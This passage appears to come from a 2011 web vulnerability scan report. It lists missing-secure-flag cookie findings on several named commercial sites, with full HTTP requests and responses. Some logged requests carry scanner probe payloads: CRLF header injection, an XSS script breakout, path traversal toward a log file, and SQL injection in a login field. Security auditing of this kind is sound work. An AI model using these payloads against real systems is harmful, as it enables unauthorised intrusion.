Date: Mon, 25 Apr 2011 15:07:31 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -812652053:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=JwDGN1TRX3qFJhPv0tBSnhLkTmpW34vhDRvgTkwqLXK4SnvMG3VM1xdGYpsFmKLXPJGL5yG5Lk8PK7KS4HKnfNNzcdJH2J9GRhFDsWdQlvhZyXNFZGnBbnGLKb2GLgXj!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...
12.7. https://checkout.netsuite.com/core/media/Netsparkere27d76ce16c84ccb9270fd25e2ba9535.nl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/media/Netsparkere27d76ce16c84ccb9270fd25e2ba9535.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/media/Netsparkere27d76ce16c84ccb9270fd25e2ba9535.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:09:35 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -110558500:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=C9RcN1TT8snZLj3J8hCcFmJpQ654HjYQZ4F5LCvBvTZ29f1ZnThL0wQpBFWf522QQvf7TN89dBTvLfjsSzfJD1yGKG3D0xhy3Ryv7M0c6rzkzZB1SlWMFLwchzvhwnV2!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...
12.8. https://checkout.netsuite.com/core/styles/Netsparker5d6e89379b044629864a1acadeba968b.nl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/styles/Netsparker5d6e89379b044629864a1acadeba968b.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/styles/Netsparker5d6e89379b044629864a1acadeba968b.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AYQCDmZk; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:04:40 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -110576631:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=MKB8N1NDfnQgHZLLbYDLh4z8yFybC5QDpN14nhTHyDDLBGWlh1d9yCB5hmlfvFCpH1Y1YByvTLKmHv2s5tFSs0FxbnfmZJM1Zpdqds57MzgTGCMyNN5C3zzpW0WtRYhQ!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...
12.9. https://checkout.netsuite.com/core/styles/Netsparkera2b9f56d99bc43aa9ec216d3c99aa80b.nl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/styles/Netsparkera2b9f56d99bc43aa9ec216d3c99aa80b.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/styles/Netsparkera2b9f56d99bc43aa9ec216d3c99aa80b.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:08:36 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1112884952:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=kpy0N1TTsKDkPgBGQZchFwhNP2xxQDtJvfwQVvtynWwgQLL0vwPLg1KTvflJQHp8yCnphBG9nfKqGrnvy0Cy2pxD6Br4LW1B7KYyndJyk1mBF7whWgydLzFw85SwJwvl!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...
12.10. https://checkout.netsuite.com/core/styles/Netsparkerb8e355f2184b49a497b4b297f62d93f9.nl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/styles/Netsparkerb8e355f2184b49a497b4b297f62d93f9.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/styles/Netsparkerb8e355f2184b49a497b4b297f62d93f9.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:07:38 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -2144353504:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=pmQ9N1TXzfvBjH2mhF3Q1jKgWhcfCCjndsRvYYL3lv5kb0VQfGTyhhQQQbjmYcLvyCNhp8Kf20GD1QlTR1F2jfcsTn5Lr1hW0SLCmSrGVSrcZnXL5rhglQsqv9ZFVhG2!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...
12.11. https://checkout.netsuite.com/core/styles/pagestyles.nl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /core/styles/pagestyles.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/styles/pagestyles.nl?ct=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crumbtext=C4C8CF&headertext=B5C1D5&ontab=FFFFFF&offtab=000000&text=000000&link=000000&bgbody=FFFFFF&bghead=FFFFFF&portlet=C0CAD9&portletlabel=000000&bgbutton=FFE599&bgrequiredfld=FFFFE5&font=Verdana%2CHelvetica%2Csans-serif&size_site_content=9pt&size_site_title=9pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3=3 HTTP/1.1
Referer: https://checkout.netsuite.com/s.nl?c=438708&sc=4&whence=&n=1&ext=T
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2010.2.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:27:02 GMT
Server: Apache
Expires: Tue, 26 Apr 2011 06:15:02 GMT
Last-Modified: Mon, 25 Apr 2011 14:27:02 GMT
NS_RTIMER_COMPOSITE: -1134201633:616363742D6A6176613036312E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=tXQJN1GWSQGJhxgnQLglP9K2nC3JgRj49hbDh6pTpzfsTnRKQQ1Dk0D1X5PfwJGyCLhxyJQfpJxpGHzCJV4sK1VsMCzpln6GNyht1gnPJpDGpHp3rdQFqyYz8rzCzbJN!-1435542349; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/css; charset=UTF-8
Content-Length: 67958

.iArrowLeft, .iArrowRight { display:inline-block; height:15px; width:16px; margin: 0 2px; background: url(/images/chiles/dashboard_icons.png) no-repeat; text-decoration: none; zoom:1}
.iArrowLeft { ma
...[SNIP]...
12.12. https://checkout.netsuite.com/pages/portal/css/main.css  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /pages/portal/css/main.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/portal/css/main.css?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00007E)%3C/script%3E HTTP/1.1
Referer: https://checkout.netsuite.com/pages/portal/page_not_found.jsp?internal=F
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=fspzN1GhTphyBQvLpyGdlJdh6BL8whyTwq2X78f8hxRthNWT2Z3jy4GGPSzLlnVZdyGJQxSTzT2hfvnn6y9XwhnznRTRZbMw6QGzXJcyQ2jBFp97np87tTDKTCTHXpxD!-1598522165; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:12:54 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Sat, 23 Apr 2011 00:28:30 GMT
NS_RTIMER_COMPOSITE: 225122148:616363742D6A6176613031362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=2ln9N1PQC1pBlnRWMG11FTSzZ6Q7LFs2lFNbJYnZ9dvJs5NzSj9RQKLJB0jQbCcLrsWnHTJhh0vdnB0mgnkmGyrxYmLv5WCDzrjppnpZy6JLTGMDpZ7c9R9LvKTjTMqt!-1598522165; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/css
Content-Length: 2044

td, p        {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #333333;
   font-size: 11px;
}

.blueSubhead        {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #004584;
   font-weight:
...[SNIP]...
12.13. https://checkout.netsuite.com/pages/portal/page_not_found.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /pages/portal/page_not_found.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/portal/page_not_found.jsp?internal=F HTTP/1.1
Referer: https://checkout.netsuite.com/s.nl?c=438708&sc=4&whence=&n=1&ext=T
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2010.2.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:59 GMT
Server: Apache
NS_RTIMER_COMPOSITE: -690374290:616363742D6A6176613038362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=0K8PN1GJqgGn0JkkHrzfLxHcVjNhkHczxJ5J34JfcXdnJGwzK09nybznnTnCvp8D498vLcRWvvh2CF7BJVDVQrVtHmgnlt8tVTVJzTsP1cDqMsf7gd27xTwt1BJB9BL4!-1927254259; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 11320


<html><head><title>NetSuite | Page Not Found</title>
<meta name="robots" content="noindex,nofollow">
<link rel="STYLESHEET" type="text/css" href="/pages/portal/css/main.css">
</head>
<body bgcolor
...[SNIP]...
12.14. https://checkout.netsuite.com/s.nl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /s.nl

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /s.nl?c=438708&sc=4&whence=&n=1&ext=T HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:36 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1700514546:616363742D6A6176613031382E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=B5nHN1Gc4ybGGqDmBpJGQWc4zLmmTVYkQCRtT62dbcTHJ21Gh0nyXcRkBNW8L2lLYXTlBCqgWNYv81PF1jh1nnCgkxLb691G2fmtYTf9gXpBvLwyvDgFJKknzh1Q5jQD!-620026609; path=/
Set-Cookie: NLVisitorId=rcHW8495AWICDiX0; domain=checkout.netsuite.com; expires=Sunday, 15-Apr-2012 14:26:36 GMT; path=/
Set-Cookie: NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:26:36 GMT; path=/
Set-Cookie: NS_VER=2011.1.0; domain=checkout.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=869
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 2244


<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...
12.15. https://customer.kronos.com/Default.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://customer.kronos.com
Path:   /Default.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

HEAD /Default.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: customer.kronos.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17287
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: ICRedirect=Url=; path=/
Set-Cookie: KronosCust=LogIn=false; path=/
Set-Cookie: ASPSESSIONIDQASQRRDR=GKMMPBCAFDPKJBLLDIIBOHPD; path=/
Cache-control: private

12.16. https://employer.unicru.com/asp/home/login.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://employer.unicru.com
Path:   /asp/home/login.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /asp/home/login.asp HTTP/1.1
Host: employer.unicru.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 42vm
Content-Length: 3592
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSRCBTSB=MCAKPIJCNPCBKCIMDMJHBHMD; path=/
Cache-control: private
Set-Cookie: KTMDWestLB=993264394.20736.0000; path=/


<html>
   <head>
       <title>Unicru: Employer's Desktop Log In</title>
       <style type="text/css">
       <!--
       .content {FONT-WEIGHT: normal; FONT-SIZE: 11px; COLOR: #666666; FONT-FAMILY: verdana, san-
...[SNIP]...
12.17. https://employer.unicru.com/asp/home/login.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://employer.unicru.com
Path:   /asp/home/login.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /asp/home/login.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: employer.unicru.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:40:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 43
Content-Length: 3592
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSAATCQTA=MGBECJJCAMBAEKDDNHDKHNIH; path=/
Cache-control: private
Set-Cookie: KTMDWestLB=184615946.20736.0000; path=/


<html>
   <head>
       <title>Unicru: Employer's Desktop Log In</title>
       <style type="text/css">
       <!--
       .content {FONT-WEIGHT: normal; FONT-SIZE: 11px; COLOR: #666666; FONT-FAMILY: verdana, san-
...[SNIP]...
12.18. https://employer.unicru.com/asp/home/login.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://employer.unicru.com
Path:   /asp/home/login.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /asp/home/login.asp HTTP/1.1
Referer: https://employer.unicru.com/asp/home/login.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: employer.unicru.com
Expect: 100-continue
Accept-Encoding: gzip, deflate
Content-Length: 106

txtUsername=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar%2flog%2fapache%2ferror.log&txtPassword=3

Response

HTTP/1.1 302 Object moved
Date: Mon, 25 Apr 2011 13:50:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 44
Location: ../../asp/home/ErrorPage.asp?ErrCode=0
Content-Length: 159
Content-Type: text/html
Set-Cookie: Emp=datpwx=&UN=&SkipSSL=&PT=&step=&LHIS=&Browser=&ActiveLocation=&Expiration=4%2F24%2F2010&ActiveState=&UType=&MultipleLocation=&RowsPerPage=&CID=&EUID=; path=/
Set-Cookie: ASPSESSIONIDSSRADQTB=EINNMKJCGHFFJHCJOHNLPDMM; path=/
Cache-control: private
Set-Cookie: KTMDWestLB=1211368202.20736.0000; path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="../../asp/home/ErrorPage.asp?ErrCode=0">here</a>.</body>
12.19. https://employer.unicru.com/asp/home/login.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://employer.unicru.com
Path:   /asp/home/login.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /asp/home/login.asp HTTP/1.1
Referer: https://employer.unicru.com/asp/home/login.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: employer.unicru.com
Expect: 100-continue
Accept-Encoding: gzip, deflate
Content-Length: 214

txtUsername=Smith&txtPassword=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&image1.
...[SNIP]...

Response

HTTP/1.1 302 Object moved
Date: Mon, 25 Apr 2011 13:52:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 44
Location: ../../asp/home/ErrorPage.asp?ErrCode=0
Content-Length: 159
Content-Type: text/html
Set-Cookie: Emp=datpwx=&UN=&SkipSSL=&PT=&step=&LHIS=&Browser=&ActiveLocation=&Expiration=4%2F24%2F2010&ActiveState=&UType=&MultipleLocation=&RowsPerPage=&CID=&EUID=; path=/
Set-Cookie: ASPSESSIONIDQCDRBTRC=NNLPKKJCDHNIPJJGHAECJHGA; path=/
Cache-control: private
Set-Cookie: KTMDWestLB=385942538.20736.0000; path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="../../asp/home/ErrorPage.asp?ErrCode=0">here</a>.</body>
12.20. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hmc/report/ HTTP/1.1
Host: hourly.deploy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:30 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=d8308cb242bf2b615f7a;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:39:30 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:39:30 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:39:30 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4789


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
12.21. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /hmc/report/index.cfm?register=http://netsparker.com/n HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: hourly.deploy.com
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 102

email=netsparker%40example.com&j_password=3&j_passwordconfirm=3&j_username=Smith&name=Smith&storenum=3

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:46 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=3e307db0b53d142e16b3;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
12.22. https://secure.trust-guard.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.trust-guard.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: http://www.trust-guard.com/Website-Security-s/89.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303748966.1; __utmc=147269874; __utmb=147269874.7.10.1303748966

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:31:28 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: PHPSESSID=u4eu14e9is22aoq9meeuch3fu7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
